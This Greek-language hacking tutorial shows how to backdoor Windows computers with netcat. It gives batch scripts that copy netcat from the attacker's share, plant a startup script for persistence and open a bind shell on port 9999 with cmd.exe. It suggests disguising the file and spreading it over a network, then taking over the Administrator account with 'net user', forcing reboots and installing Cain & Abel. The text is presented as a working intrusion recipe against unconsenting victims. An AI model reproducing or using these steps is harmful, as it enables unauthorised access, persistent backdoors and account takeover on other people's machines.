Όπως όλοι γνωρίζουμε ένα trojan είναι
πολύ πιθανόν να ανακαλυφθεί από τα antivirus οπότε αυτό που θα
χρειαστούμε στην συγκεκριμένη περίπτωση είναι το netcat.Το netcat είναι
ένα πρόγραμμα το οποίο ανοίγει μία θύρα (port) σε κάποιον υπολογιστή για
να μας δώσει πρόσβαση.
Θα πρέπει λοιπόν να γράψουμε ένα batch
αρχείο το οποίο θα αντιγράφει το netcat στον απομακρυσμένο
υπολογιστή.Για να γίνει αυτό θα πρέπει το batch αρχείο να εκτελεστεί με
κάποιον τρόπο από τον υπολογιστή που θέλουμε να χακάρουμε.
Ανοίγουμε το σημειωματάρειο και πληκτρολογούμε το ακόλουθο:@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe
cd “Documents and Settings”
cd “All Users”
cd “Start Menu”
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (Αυτό είναι ένα άλλο batch αρχείο που θα γράψουμε παρακάτω)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Σώζουμε το αρχείο σαν .bat
Το επόμενο batch αρχείο θα χρησιμοποιηθεί
για να σιγουρευτούμε ότι το port που καθορίσαμε θα ανοίγει κάθε φορά
που θα κάνουν εκκίνηση τα windows.Μπορούμε φυσικά να βάλουμε όποιο port
επιθυμούμε.Ανοίγουμε λοιπόν το σημειωματάρειο πάλι και γράφουμε το εξής:
@echo offcd\
netcat.exe -L -p 9999 -d -e cmd.exe
Σώζουμε το αρχείο σαν .bat.Αυτό θα είναι
το αρχείο που θα αντιγραφεί στον φάκελο startup από το προηγούμενο bat
που είχαμε γράψει.
Μπορούμε φυσικά να κρύψουμε αυτό το
αρχείο σε ένα άλλο αρχείο και να το διαμοιράσουμε μέσα στο δίκτυο.Όταν
κάποιος τρέξει το αρχείο το netcat θα αντιγραφεί στον υπολογιστή του και
θα ανοίξει μία θύρα στην προκειμένη περίπτωση είναι η 9999.Μόλις
η θύρα ανοίξει μπορούμε να χρησιμοποιήσουμε το telnet σε αυτήν την θύρα
του απομακρυσμένου υπολογιστή και να αποκτήσουμε πλήρης πρόσβαση.
Τώρα που έχουμε πλήρης πρόσβαση το επόμενα βήμα είναι να αλλάξουμε το administrator password με την εντολή:
net user Administrator newpassword
Πλέον μπορούμε να κάνουμε ότι θέλουμε
στον υπολογιστή όπως για παράδειγμα να τερματίσουμε την λειτουργία του
κτλ.Μπορούμε να το κάνουμε αυτό απλώς αν μπούμε στον φάκελο System32 και
πληκτρολογήσουμε το παρακάτω:
shutdown -r -t 10 -c “Hello”
Ο απομακρυσμένος υπολογιστής θα κάνει
επανεκκίνηση μέσα σε 10 δευτερόλεπτα.Μπορούμε αν θέλουμε να το
προχωρήσουμε ακόμα πιο μακριά απλά και μόνο αν εγκαταστήσουμε το Cain
& Abel στον υπολογιστή μας και μετά εγκαταστήσουμε το Abel στον
απομακρυσμένο υπολογιστή εφόσον πλέον ξέρουμε και το administrator
password.Μόλις εγκατασταθεί το Abel στον απομακρυσμένο υπολογιστή
μπορούμε να κάνουμε εκκίνηση και τερματισμό υπηρεσίων και πολλά
περισσότερα…
Κατεβάστε το netcat από εδώ.
